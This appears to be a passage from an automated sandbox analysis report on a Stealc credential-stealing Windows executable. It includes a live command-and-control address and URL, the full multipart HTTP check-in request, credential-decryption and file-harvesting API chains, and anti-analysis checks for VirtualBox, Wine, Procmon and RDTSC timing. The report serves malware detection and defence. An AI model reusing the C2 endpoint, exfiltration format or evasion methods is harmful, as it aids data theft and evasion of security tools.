                Source: 0.2.file.exe.20000.0.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                Source: 0.2.file.exe.20000.0.unpackString decryptor: POST
                Source: 0.2.file.exe.20000.0.unpackString decryptor: HTTP/1.1
                Source: 0.2.file.exe.20000.0.unpackString decryptor: Content-Disposition: form-data; name="
                Source: 0.2.file.exe.20000.0.unpackString decryptor: hwid
                Source: 0.2.file.exe.20000.0.unpackString decryptor: build
                Source: 0.2.file.exe.20000.0.unpackString decryptor: token
                Source: 0.2.file.exe.20000.0.unpackString decryptor: file_name
                Source: 0.2.file.exe.20000.0.unpackString decryptor: file
                Source: 0.2.file.exe.20000.0.unpackString decryptor: message
                Source: 0.2.file.exe.20000.0.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                Source: 0.2.file.exe.20000.0.unpackString decryptor: screenshot.jpg
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00039030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00039030
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0002A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_0002A210
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000272A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_000272A0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0002A2B0 CryptUnprotectData,LocalAlloc,LocalFree,0_2_0002A2B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0002C920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0002C920
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.1756543501.0000000004E5B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.1756543501.0000000004E5B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000340F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0002E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00021710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0002F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000347C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00033B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00034B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0002DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0002EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0002BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0002DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose

                Networking

                Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.206:80
                Source: Malware configuration extractor | URLs: http://185.215.113.206/6c4adf523b719729.php
                Source: global traffic | HTTP traffic detected:
                    GET / HTTP/1.1
                    Host: 185.215.113.206
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                Source: global traffic | HTTP traffic detected:
                    POST /6c4adf523b719729.php HTTP/1.1
                    Content-Type: multipart/form-data; boundary=----KJKEHIIJJECFHJKECFHD
                    Host: 185.215.113.206
                    Content-Length: 211
                    Connection: Keep-Alive
                    Cache-Control: no-cache

                    ------KJKEHIIJJECFHJKECFHD
                    Content-Disposition: form-data; name="hwid"

                    D06FCA4770BC4158135236
                    ------KJKEHIIJJECFHJKECFHD
                    Content-Disposition: form-data; name="build"

                    tale
                    ------KJKEHIIJJECFHJKECFHD--
                Source: Joe Sandbox View | IP Address: 185.215.113.206
                Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
                Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000262D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
                Source: global traffic | HTTP traffic detected:
                    GET / HTTP/1.1
                    Host: 185.215.113.206
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                Source: unknown | HTTP traffic detected:
                    POST /6c4adf523b719729.php HTTP/1.1
                    Content-Type: multipart/form-data; boundary=----KJKEHIIJJECFHJKECFHD
                    Host: 185.215.113.206
                    Content-Length: 211
                    Connection: Keep-Alive
                    Cache-Control: no-cache

                    ------KJKEHIIJJECFHJKECFHD
                    Content-Disposition: form-data; name="hwid"

                    D06FCA4770BC4158135236
                    ------KJKEHIIJJECFHJKECFHD
                    Content-Disposition: form-data; name="build"

                    tale
                    ------KJKEHIIJJECFHJKECFHD--
                Source: file.exe, 00000000.00000002.1800359502.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
                Source: file.exe, 00000000.00000002.1800359502.0000000001016000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/
                Source: file.exe, 00000000.00000002.1800359502.0000000001016000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
                Source: file.exe, 00000000.00000002.1800359502.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpa-
                Source: file.exe, file.exe, 00000000.00000003.1756543501.0000000004E5B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

                System Summary

                Source: file.exe | Static PE information: section name:
                Source: file.exe | Static PE information: section name: .rsrc
                Source: file.exe | Static PE information: section name: .idata
                Source: file.exe | Static PE information: section name:
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00060098
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040317A
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00052138
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00476118
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0007B198
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0008E258
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00064288
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000AB308
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0047B37C
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0009D39E
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0046F4E4
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003724CD
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0004E544
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00044573
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0008D5A8
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000645A8
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003A3621
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0009A648
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000666C8
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000A96FD
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0007D720
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00096799
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0048379E
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0042C7A9
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00074868
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0007B8A8
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004658FB
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000798B8
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0008F8D6
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0044E8A7
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0036D9E5
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003B7A29
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00090B88
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00358BBD
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00094BA8
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0047EBF6
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0009AC28
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00477C17
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0008AD38
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0007BD68
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00051D78
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00075DB9
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00074DC8
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00471D9B
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00479DB9
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00068E78
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00481E8F
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00091EE8
                Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00024610 appears 316 times
                Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exe | Static PE information: Section: tnleqdlj ZLIB complexity 0.9949933236506746
                Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00039790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00033970 CoCreateInstance,MultiByteToWideChar,lstrcpyn
                Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\CV4CISNX.htm
                Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
                Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                Source: file.exe | Static file information: File size 2146304 > 1048576
                Source: file.exe | Static PE information: Raw size of tnleqdlj is bigger than: 0x100000 < 0x1a0e00
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.1756543501.0000000004E5B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.1756543501.0000000004E5B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp

                Data Obfuscation

                Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.20000.0.unpack :EW;.rsrc :W;.idata :W; :EW;tnleqdlj:EW;afcdkohf:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;tnleqdlj:EW;afcdkohf:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00039BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
                Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
                Source: file.exe | Static PE information: real checksum: 0x210957 should be: 0x21529d
                Source: file.exe | Static PE information: section name:
                Source: file.exe | Static PE information: section name: .rsrc
                Source: file.exe | Static PE information: section name: .idata
                Source: file.exe | Static PE information: section name:
                Source: file.exe | Static PE information: section name: tnleqdlj
                Source: file.exe | Static PE information: section name: afcdkohf
                Source: file.exe | Static PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004B905B push edx; mov dword ptr [esp], esi | 0_2_004B9064
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004B905B push esi; mov dword ptr [esp], esp | 0_2_004B9068
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004B905B push esi; mov dword ptr [esp], ecx | 0_2_004B927E
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005680D4 push edi; mov dword ptr [esp], 788E1011h | 0_2_00568101
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005680D4 push ebx; mov dword ptr [esp], ecx | 0_2_00568115
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004B00F2 push eax; mov dword ptr [esp], ebx | 0_2_004B010E
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004B00F2 push esi; mov dword ptr [esp], ecx | 0_2_004B013B
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004B00F2 push 433B288Ah; mov dword ptr [esp], ebx | 0_2_004B01CC
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004A109D push ebp; mov dword ptr [esp], edx | 0_2_004A11AA
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0004A0DC push eax; retf | 0_2_0004A0F1
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0004A0F2 push eax; retf | 0_2_0004A119
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00496178 push 4FB4AD30h; mov dword ptr [esp], esp | 0_2_00499740
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040317A push ebx; mov dword ptr [esp], ecx | 0_2_004032D4
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0053D11C push 2BB63691h; mov dword ptr [esp], esp | 0_2_0053D142
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00476118 push edi; mov dword ptr [esp], 04BB119Ch | 0_2_00476138
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00476118 push 0C83DC39h; mov dword ptr [esp], esi | 0_2_00476208
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00476118 push ebp; mov dword ptr [esp], eax | 0_2_00476275
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00476118 push 12EFEBDCh; mov dword ptr [esp], ebp | 0_2_00476405
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00476118 push ebx; mov dword ptr [esp], eax | 0_2_00476420
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00476118 push ebx; mov dword ptr [esp], 7131D4B2h | 0_2_00476582
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00476118 push ebx; mov dword ptr [esp], esi | 0_2_00476596
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00476118 push ebp; mov dword ptr [esp], 0819E69Ah | 0_2_0047659A
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00476118 push edi; mov dword ptr [esp], ecx | 0_2_004765C6
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00476118 push ebp; mov dword ptr [esp], 010F8192h | 0_2_00476627
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00476118 push 177F1F12h; mov dword ptr [esp], edx | 0_2_004766DD
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00476118 push ecx; mov dword ptr [esp], edi | 0_2_004766E1
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00476118 push esi; mov dword ptr [esp], eax | 0_2_00476741
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00476118 push ebp; mov dword ptr [esp], esi | 0_2_00476788
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00476118 push 3E99096Ch; mov dword ptr [esp], eax | 0_2_00476920
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00476118 push ebx; mov dword ptr [esp], edx | 0_2_00476924
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00476118 push 635F0E2Fh; mov dword ptr [esp], edi | 0_2_0047693A
                Source: file.exe | Static PE information: section name: tnleqdlj entropy: 7.955054294676287

                Boot Survival

                Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
                Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
                Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
                Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00039BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-36239
                Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4878A9 second address: 4878AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4878AD second address: 4878B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 487B48 second address: 487B52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 487E3B second address: 487E41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 48BA8C second address: 48BAAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3D90D93B4Ah 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 jng 00007F3D90D93B54h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 48BAAC second address: 48BAB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 48BB84 second address: 48BB9A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007F3D90D93B4Ch 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 48BB9A second address: 48BBA4 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3D90F37F1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 48BBA4 second address: 48BBB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F3D90D93B46h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 47FCEB second address: 47FCF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 47FCF0 second address: 47FCFA instructions: 0x00000000 rdtsc 0x00000002 jng 00007F3D90D93B4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 47FCFA second address: 47FD34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D90F37F28h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007F3D90F37F48h 0x00000011 pushad 0x00000012 jmp 00007F3D90F37F23h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A9D9A second address: 4A9D9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A9D9E second address: 4A9DB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F3D90F37F1Ah 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4AAA99 second address: 4AAA9F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4AAA9F second address: 4AAACA instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3D90F37F2Eh 0x00000008 jmp 00007F3D90F37F28h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 ja 00007F3D90F37F16h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4AAACA second address: 4AAAEF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jo 00007F3D90D93B46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3D90D93B57h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4AAC7C second address: 4AAC81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0DD4 second address: 4A0DD9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0DD9 second address: 4A0DE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AAF1E second address: 4AAF24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AAF24 second address: 4AAF31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F3D90F37F16h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AFE52 second address: 4AFE60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnc 00007F3D90D93B46h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B1355 second address: 4B1359 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B1359 second address: 4B135F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
